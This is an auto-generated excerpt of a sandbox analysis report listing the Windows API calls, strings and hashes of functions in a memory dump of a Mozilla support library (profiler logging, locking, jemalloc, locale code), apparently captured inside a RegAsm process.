                                                                                    • Instruction Fuzzy Hash: 8C11B2B19052256BE710AF7ACD44BABBEF8EF46354F044529F888A7300E774984087E2
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7099C1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C7099CE
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C7099F8
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C709A05
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C709A0D
                                                                                      • Part of subcall function 6C709A60: GetCurrentThreadId.KERNEL32 ref: 6C709A95
                                                                                      • Part of subcall function 6C709A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C709A9D
                                                                                      • Part of subcall function 6C709A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C709ACC
                                                                                      • Part of subcall function 6C709A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C709BA7
                                                                                      • Part of subcall function 6C709A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C709BB8
                                                                                      • Part of subcall function 6C709A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C709BC9
                                                                                      • Part of subcall function 6C6FCBE8: GetCurrentProcess.KERNEL32(?,6C6C31A7), ref: 6C6FCBF1
                                                                                      • Part of subcall function 6C6FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6C31A7), ref: 6C6FCBFA
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C709A15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                                    • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                                    • API String ID: 2359002670-141131661
                                                                                    • Opcode ID: ad8e2361ba7b41787ff62c40493b18256dc1ec0cae64d8692735a0524a28c9c5
                                                                                    • Instruction ID: 01f323811ad5c978de7fbd7ad8681a3dfc5f2f6c3784b836d77aa9686e8249ab
                                                                                    • Opcode Fuzzy Hash: ad8e2361ba7b41787ff62c40493b18256dc1ec0cae64d8692735a0524a28c9c5
                                                                                    • Instruction Fuzzy Hash: 9C01C4B5B045249BDB007F6996096BA3BB8EB9326CF04C137FD2553B41DB345C05C7A1
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C6D1FDE
                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C6D1FFD
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D2011
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D2059
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                     • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoCreateInstance$combase.dll
                                                                                    • API String ID: 4190559335-2197658831
                                                                                    • Opcode ID: 4d6fe8abd031200af3084a59da6a7d76f3acbb5a23c2c20b744b89e2be41ff89
                                                                                    • Instruction ID: 43042f923da7226b6c9dbb60091f02d07a00bc6472f9de7ac96acf2f309c6d4d
                                                                                    • Opcode Fuzzy Hash: 4d6fe8abd031200af3084a59da6a7d76f3acbb5a23c2c20b744b89e2be41ff89
                                                                                    • Instruction Fuzzy Hash: D8117975240205AFEF20FF15C948E9ABB79EB8A36DF20C03AE91482640C731AC51CBA4
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C6FD9F0,00000000), ref: 6C6D0F1D
                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C6D0F3C
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D0F50
                                                                                    • FreeLibrary.KERNEL32(?,6C6FD9F0,00000000), ref: 6C6D0F86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoInitializeEx$combase.dll
                                                                                    • API String ID: 4190559335-2063391169
                                                                                    • Opcode ID: 1c6af8601742f278f5c0b6c26097041632652b13db25b2e3d9d60322ce03444e
                                                                                    • Instruction ID: 03d22900f16c6d23792e86c9c51d647d96d0e017149a9cbba0e009efbd81c8b9
                                                                                    • Opcode Fuzzy Hash: 1c6af8601742f278f5c0b6c26097041632652b13db25b2e3d9d60322ce03444e
                                                                                    • Instruction Fuzzy Hash: 02119E746052409BDF00EF59CE08E5AB779EB8B32AF12C23BED05C2641D730A405CE5A
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F559
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C70F561
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F585
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8), ref: 6C70F5A3
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C70F3A8
                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C70F56A
                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C70F499
                                                                                    • [I %d/%d] profiler_resume, xrefs: 6C70F239
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                    • API String ID: 2848912005-2840072211
                                                                                    • Opcode ID: 32a8e3ff55dc0050bc8f149208ffa905a86d179065312b8cf0f8271c55143490
                                                                                    • Instruction ID: ff964b0911c6f712410a45797399546adb3dc1332981b1bc46f3eeb310dda416
                                                                                    • Opcode Fuzzy Hash: 32a8e3ff55dc0050bc8f149208ffa905a86d179065312b8cf0f8271c55143490
                                                                                    • Instruction Fuzzy Hash: 30F030B57006149BDB007B69994CA6E77BDEB8626DF008037FA1583701DB756C058765
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,6C6D0DF8), ref: 6C6D0E82
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C6D0EA1
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D0EB5
                                                                                    • FreeLibrary.KERNEL32 ref: 6C6D0EC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                    • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                    • API String ID: 391052410-1680159014
                                                                                    • Opcode ID: 4b6a67caf3c488f77c577330dd242b2d28505400febf5a2a903e7bdf9f8714c4
                                                                                    • Instruction ID: 2632d79d42b67e6b6b8fd297d90d043a31b4559abb71c94ce1f7aaffb2e3fd05
                                                                                    • Opcode Fuzzy Hash: 4b6a67caf3c488f77c577330dd242b2d28505400febf5a2a903e7bdf9f8714c4
                                                                                    • Instruction Fuzzy Hash: E2014B747003928BDF02AFF8C914A4A77B6E74731DF92A936D91182F40D738B8068A59
                                                                                    APIs
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                      • Part of subcall function 6C709420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                      • Part of subcall function 6C709420: __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F619
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C70F598), ref: 6C70F621
                                                                                      • Part of subcall function 6C7094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C7094EE
                                                                                      • Part of subcall function 6C7094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C709508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C70F637
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000,?,6C70F598), ref: 6C70F645
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C74F4B8,?,?,00000000,?,6C70F598), ref: 6C70F663
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C70F62A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                    • API String ID: 2848912005-753366533
                                                                                    • Opcode ID: 302c29f5faa00632aba0b63eeef9ee6f7ad52a0e26c1bd47cf8ac70812a1a67f
                                                                                    • Instruction ID: bfc2bd8e846ed1d1c88fe90c7e9b918122eca3a7422b40e53c5a3cf1a55b4b9b
                                                                                    • Opcode Fuzzy Hash: 302c29f5faa00632aba0b63eeef9ee6f7ad52a0e26c1bd47cf8ac70812a1a67f
                                                                                    • Instruction Fuzzy Hash: 42F03AB5300614ABDB007B69994CAAA7BBDEB862ADF008037FA1583741DB756C058B65
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C6FCFAE,?,?,?,6C6C31A7), ref: 6C7005FB
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C6FCFAE,?,?,?,6C6C31A7), ref: 6C700616
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6C31A7), ref: 6C70061C
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6C31A7), ref: 6C700627
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _writestrlen
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 2723441310-2186867486
                                                                                    • Opcode ID: 30b4c8d3fd668e506913d3aa1328c9dc6782377afa7848099f155f992cee42fd
                                                                                    • Instruction ID: 5d370513ba67af6800082f8ff187fd5d21147be970b3bc2cc3b57aaa380c0437
                                                                                    • Opcode Fuzzy Hash: 30b4c8d3fd668e506913d3aa1328c9dc6782377afa7848099f155f992cee42fd
                                                                                    • Instruction Fuzzy Hash: 38E08CE2A0202037F6142256AC8ADBB761CDBC6139F08013AFD0D86302E94BBD1A51F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 34eba450723d388768bab4ef1493ac81b088e0fa3dec7fd2711af696a4434721
                                                                                    • Instruction ID: d78adcdda1ea42caa084005b4d53e5aa0827a2263a227ae6c642a1a1a0600cb0
                                                                                    • Opcode Fuzzy Hash: 34eba450723d388768bab4ef1493ac81b088e0fa3dec7fd2711af696a4434721
                                                                                    • Instruction Fuzzy Hash: 6EA14A70A01645CFDB24CF29C994A9AFBF1BF49304F45866ED44A9BB01E730B985CF94
                                                                                    APIs
                                                                                      • Part of subcall function 6C706060: moz_xmalloc.MOZGLUE(00000024,3DC044E3,00000000,?,00000000,?,?,6C705FCB,6C7079A3), ref: 6C706078
                                                                                    • free.MOZGLUE(-00000001), ref: 6C7072F6
                                                                                    • free.MOZGLUE(?), ref: 6C707311
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$moz_xmalloc
                                                                                    • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                                    • API String ID: 3009372454-760240034
                                                                                    • Opcode ID: ab35fe6a8d9ac341ecf609ff1e8aa1a14d016b5179672e37db774346f8563ec6
                                                                                    • Instruction ID: 34ce3cb3b88d20054726caf1fa7322667786de72130e1735604b8c6a0a6423a6
                                                                                    • Opcode Fuzzy Hash: ab35fe6a8d9ac341ecf609ff1e8aa1a14d016b5179672e37db774346f8563ec6
                                                                                    • Instruction Fuzzy Hash: E27192B1F002198FDB18CF69C99469DB7F2AF84314F25C12DD81AAB751DB31A946CBC0
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7214C5
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7214E2
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C721546
                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C7215BA
                                                                                    • free.MOZGLUE(?), ref: 6C7216B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                    • String ID:
                                                                                    • API String ID: 1909280232-0
                                                                                    • Opcode ID: 382286ed8b623c1fd338d04b643c15e052f03742c9b533e16c321ee2b6122047
                                                                                    • Instruction ID: 9d5b589af648430d529ad2be0811ca0d67a2a89831fd2e71107e1869fbb74a75
                                                                                    • Opcode Fuzzy Hash: 382286ed8b623c1fd338d04b643c15e052f03742c9b533e16c321ee2b6122047
                                                                                    • Instruction Fuzzy Hash: 29611072A007048BDB21DF25C984BDEB7B5BF8A308F44852DED8A57701EB35E949CB91
                                                                                    APIs
                                                                                    • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C71C1F1
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C71C293
                                                                                    • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C71C29E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: fgetc$memcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1522623862-0
                                                                                    • Opcode ID: 50b7eeb02317adf080bc53babb2f96b7308342cc59d78f87de151153d957ad25
                                                                                    • Instruction ID: e571274a61cee35d01144719e99c339cd4e60cf6f80065be0cb853465798d60f
                                                                                    • Opcode Fuzzy Hash: 50b7eeb02317adf080bc53babb2f96b7308342cc59d78f87de151153d957ad25
                                                                                    • Instruction Fuzzy Hash: 6461CF71A04214CFCB14DFE8D98459EBBB5FF49325F19453AE802A7A51C731A944CFA1
                                                                                    APIs
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C719FDB
                                                                                    • free.MOZGLUE(?,?), ref: 6C719FF0
                                                                                    • free.MOZGLUE(?,?), ref: 6C71A006
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C71A0BE
                                                                                    • free.MOZGLUE(?,?), ref: 6C71A0D5
                                                                                    • free.MOZGLUE(?,?), ref: 6C71A0EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                    • String ID:
                                                                                    • API String ID: 956590011-0
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71DC60
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C71D38A,?), ref: 6C71DC6F
                                                                                    • free.MOZGLUE(?,?,?,?,?,6C71D38A,?), ref: 6C71DCC1
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C71D38A,?), ref: 6C71DCE9
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C71D38A,?), ref: 6C71DD05
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C71D38A,?), ref: 6C71DD4A
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 1842996449-0
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(6C74E744,ewrl,00000000,ewrl,?,6C6E6112), ref: 6C6C39AF
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E744,?,6C6E6112), ref: 6C6C3A34
                                                                                    • EnterCriticalSection.KERNEL32(6C74E784,6C6E6112), ref: 6C6C3A4B
                                                                                    • LeaveCriticalSection.KERNEL32(6C74E784), ref: 6C6C3A5F
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                    • String ID: \tl$ewrl
                                                                                    • API String ID: 3168844106-1392482807
                                                                                    APIs
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C71C82D
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C71C842
                                                                                      • Part of subcall function 6C71CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C73B5EB,00000000), ref: 6C71CB12
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C71C863
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C71C875
                                                                                      • Part of subcall function 6C6FB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C73B636,?), ref: 6C6FB143
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C71C89A
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71C8BC
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 2745304114-0
                                                                                    APIs
